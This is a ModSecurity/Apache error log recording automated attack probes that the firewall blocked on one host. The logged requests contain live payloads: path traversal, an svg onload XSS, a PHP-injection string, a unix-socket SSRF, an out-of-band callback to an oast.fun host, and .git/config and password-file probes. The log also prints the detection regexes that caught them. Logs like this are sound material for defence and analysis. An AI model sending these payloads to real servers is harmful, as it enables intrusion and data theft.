[Sun Sep 07 15:05:17.071292 2025] [:error] [pid 2541667] [client 185.165.171.225:27824] [client 185.165.171.225] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_/../weaver.properties"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/api/portalTsLogin/utils/getE9DevelopAllNameValue2"] [unique_id "aL2DDadcY-VinDEbW8JokAAAAAE"]
[Sun Sep 07 15:05:17.071340 2025] [:error] [pid 2541667] [client 185.165.171.225:27824] [client 185.165.171.225] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /api/portaltslogin/utils/gete9developallnamevalue2?filename=portaldev_/../weaver.properties"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/api/portalTsLogin/utils/getE9DevelopAllNameValue2"] [unique_id "aL2DDadcY-VinDEbW8JokAAAAAE"]
[Sun Sep 07 15:05:17.071398 2025] [:error] [pid 2543900] [client 185.165.171.225:27772] [client 185.165.171.225] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-Portal-Context-Origin outside range: 1-255. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "482"] [id "920270"] [msg "Invalid character in request (null character)"] [data "REQUEST_HEADERS:X-Portal-Context-Origin=HttP://d2tmgdtjfcvvbimombm0drqpsm53ad7qn.oast.fun?\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "economiasolidale.38121.it"] [uri "/_proxy/api/v3/portal"] [unique_id "aL2DDdF_QkkF-5QUXQITMgAAAAg"]
[Sun Sep 07 15:05:17.071848 2025] [:error] [pid 2541667] [client 185.165.171.225:27824] [client 185.165.171.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/portalTsLogin/utils/getE9DevelopAllNameValue2"] [unique_id "aL2DDadcY-VinDEbW8JokAAAAAE"]
[Sun Sep 07 15:05:17.072032 2025] [:error] [pid 2541667] [client 185.165.171.225:27824] [client 185.165.171.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/portalTsLogin/utils/getE9DevelopAllNameValue2"] [unique_id "aL2DDadcY-VinDEbW8JokAAAAAE"]
[Sun Sep 07 15:05:17.075577 2025] [:error] [pid 2543899] [client 185.165.171.225:27840] [client 185.165.171.225] ModSecurity: Warning. detected XSS using libinjection. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "59"] [id "941100"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: XSS data found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "economiasolidale.38121.it"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "aL2DDToUijQ7e1MU6UbPfAAAAAc"]
[Sun Sep 07 15:05:17.075664 2025] [:error] [pid 2543899] [client 185.165.171.225:27840] [client 185.165.171.225] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\"'`;\\\\/0-9=\\\\x0B\\\\x09\\\\x0C\\\\x3B\\\\x2C\\\\x28\\\\x3B]+on[a-zA-Z]+[\\\\s\\\\x0B\\\\x09\\\\x0C\\\\x3B\\\\x2C\\\\x28\\\\x3B]*?=" at ARGS:where. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "120"] [id "941120"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: onload= found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "economiasolidale.38121.it"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "aL2DDToUijQ7e1MU6UbPfAAAAAc"]
[Sun Sep 07 15:05:17.075792 2025] [:error] [pid 2543899] [client 185.165.171.225:27840] [client 185.165.171.225] ModSecurity: Warning. Pattern match "(?i:(?:<\\\\w[\\\\s\\\\S]*[\\\\s\\\\/]|['\\"](?:[\\\\s\\\\S]*[\\\\s\\\\/])?)(?:on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)|op)|i(?:s(?:c(?:hargingtimechange ..." at ARGS:where. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "218"] [id "941160"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: \\x22><svg onload= found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "economiasolidale.38121.it"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "aL2DDToUijQ7e1MU6UbPfAAAAAc"]
[Sun Sep 07 15:05:17.076138 2025] [:error] [pid 2543899] [client 185.165.171.225:27840] [client 185.165.171.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "aL2DDToUijQ7e1MU6UbPfAAAAAc"]
[Sun Sep 07 15:05:17.076312 2025] [:error] [pid 2543899] [client 185.165.171.225:27840] [client 185.165.171.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "aL2DDToUijQ7e1MU6UbPfAAAAAc"]
[Sun Sep 07 15:05:17.155370 2025] [:error] [pid 2541667] [client 185.165.171.225:27788] [client 185.165.171.225] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "350"] [id "933160"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: chr(97)) or 1: print chr(121)+chr(101)+chr(115) found within ARGS:uid: ,chr(97)) or 1: print chr(121)+chr(101)+chr(115)\\x0d\\x0a#"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "economiasolidale.38121.it"] [uri "/audit/gui_detail_view.php"] [unique_id "aL2DDadcY-VinDEbW8JokQAAAAE"]
[Sun Sep 07 15:05:17.156002 2025] [:error] [pid 2541667] [client 185.165.171.225:27788] [client 185.165.171.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/audit/gui_detail_view.php"] [unique_id "aL2DDadcY-VinDEbW8JokQAAAAE"]
[Sun Sep 07 15:05:17.156218 2025] [:error] [pid 2541667] [client 185.165.171.225:27788] [client 185.165.171.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/audit/gui_detail_view.php"] [unique_id "aL2DDadcY-VinDEbW8JokQAAAAE"]
[Sun Sep 07 15:05:17.163532 2025] [:error] [pid 2543899] [client 185.165.171.225:27794] [client 185.165.171.225] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".cs"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/wizard/wizard.cs"] [unique_id "aL2DDToUijQ7e1MU6UbPfQAAAAc"]
[Sun Sep 07 15:05:17.164043 2025] [:error] [pid 2543899] [client 185.165.171.225:27794] [client 185.165.171.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wizard/wizard.cs"] [unique_id "aL2DDToUijQ7e1MU6UbPfQAAAAc"]
[Sun Sep 07 15:05:17.164237 2025] [:error] [pid 2543899] [client 185.165.171.225:27794] [client 185.165.171.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wizard/wizard.cs"] [unique_id "aL2DDToUijQ7e1MU6UbPfQAAAAc"]
[Sun Sep 07 15:05:17.207419 2025] [:error] [pid 2554184] [client 185.165.171.225:27876] [client 185.165.171.225] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "662"] [id "920340"] [msg "Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "economiasolidale.38121.it"] [uri "/cgi-bin/webproc"] [unique_id "aL2DDSaXV-vyY4cSRD3CDwAAAAA"]
[Sun Sep 07 15:05:17.245720 2025] [:error] [pid 2543899] [client 185.165.171.225:27886] [client 185.165.171.225] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/_vti_pvt/service.pwd"] [unique_id "aL2DDToUijQ7e1MU6UbPfgAAAAc"]
[Sun Sep 07 15:05:17.246115 2025] [:error] [pid 2543899] [client 185.165.171.225:27886] [client 185.165.171.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/_vti_pvt/service.pwd"] [unique_id "aL2DDToUijQ7e1MU6UbPfgAAAAc"]
[Sun Sep 07 15:05:17.246290 2025] [:error] [pid 2543899] [client 185.165.171.225:27886] [client 185.165.171.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/_vti_pvt/service.pwd"] [unique_id "aL2DDToUijQ7e1MU6UbPfgAAAAc"]
[Sun Sep 07 15:05:18.330129 2025] [:error] [pid 2543900] [client 185.165.171.225:28606] [client 185.165.171.225] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "662"] [id "920340"] [msg "Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "economiasolidale.38121.it"] [uri "/service/"] [unique_id "aL2DDtF_QkkF-5QUXQITNQAAAAg"]
[Sun Sep 07 15:05:18.330335 2025] [:error] [pid 2543900] [client 185.165.171.225:28606] [client 185.165.171.225] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://Ed8T/wsrpc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/service/"] [unique_id "aL2DDtF_QkkF-5QUXQITNQAAAAg"]
[Sun Sep 07 15:05:18.330421 2025] [:error] [pid 2543900] [client 185.165.171.225:28606] [client 185.165.171.225] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://Ed8T/wsrpc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/service/"] [unique_id "aL2DDtF_QkkF-5QUXQITNQAAAAg"]
[Sun Sep 07 15:05:18.330458 2025] [:error] [pid 2543900] [client 185.165.171.225:28606] [client 185.165.171.225] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://ed8t/wsrpc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/service/"] [unique_id "aL2DDtF_QkkF-5QUXQITNQAAAAg"]
[Sun Sep 07 15:05:18.331173 2025] [:error] [pid 2543900] [client 185.165.171.225:28606] [client 185.165.171.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 17)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/service/"] [unique_id "aL2DDtF_QkkF-5QUXQITNQAAAAg"]
[Sun Sep 07 15:05:18.331352 2025] [:error] [pid 2543900] [client 185.165.171.225:28606] [client 185.165.171.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 17 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 17, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/service/"] [unique_id "aL2DDtF_QkkF-5QUXQITNQAAAAg"]
[Sun Sep 07 15:05:18.592195 2025] [authz_core:error] [pid 2552092] [client 185.165.171.225:28592] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/home
[Mon Sep 08 13:34:39.645221 2025] [:error] [pid 2565376] [client 198.55.98.232:49938] [client 198.55.98.232] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aL6_T9UwhbaEVNJFwv1wAAAAAAs"]
[Mon Sep 08 13:34:39.645511 2025] [:error] [pid 2565376] [client 198.55.98.232:49938] [client 198.55.98.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aL6_T9UwhbaEVNJFwv1wAAAAAAs"]
[Mon Sep 08 13:34:39.645699 2025] [:error] [pid 2565376] [client 198.55.98.232:49938] [client 198.55.98.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aL6_T9UwhbaEVNJFwv1wAAAAAAs"]
[Mon Sep 08 13:40:47.947702 2025] [:error] [pid 2565344] [client 45.148.10.246:52976] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aL7Av5Muzi9Jz-WndUVAcgAAAAU"]
[Mon Sep 08 13:40:47.947957 2025] [:error] [pid 2565344] [client 45.148.10.246:52976] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aL7Av5Muzi9Jz-WndUVAcgAAAAU"]
[Mon Sep 08 13:40:47.948132 2025] [:error] [pid 2565344] [client 45.148.10.246:52976] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aL7Av5Muzi9Jz-WndUVAcgAAAAU"]
[Mon Sep 08 16:16:34.747710 2025] [:error] [pid 2565381] [client 16.16.192.135:56416] [client 16.16.192.135] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aL7lQnFjoSwa2lIDhooebgAAAA0"]
[Mon Sep 08 16:16:34.747965 2025] [:error] [pid 2565381] [client 16.16.192.135:56416] [client 16.16.192.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aL7lQnFjoSwa2lIDhooebgAAAA0"]
[Mon Sep 08 16:16:34.748126 2025] [:error] [pid 2565381] [client 16.16.192.135:56416] [client 16.16.192.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aL7lQnFjoSwa2lIDhooebgAAAA0"]
